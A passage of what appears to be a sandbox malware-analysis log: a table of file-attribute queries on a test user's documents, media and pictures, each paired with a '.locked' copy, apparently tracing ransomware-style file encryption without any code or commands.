| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl | type = file_attributes |
|
18 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\PLFZxgHohNR10KDihD.mp3 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\PLFZxgHohNR10KDihD.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\PLFZxgHohNR10KDihD.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures | type = file_attributes |
|
49 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7 | type = file_attributes |
|
18 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL | type = file_attributes |
|
14 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg | type = file_type |
|
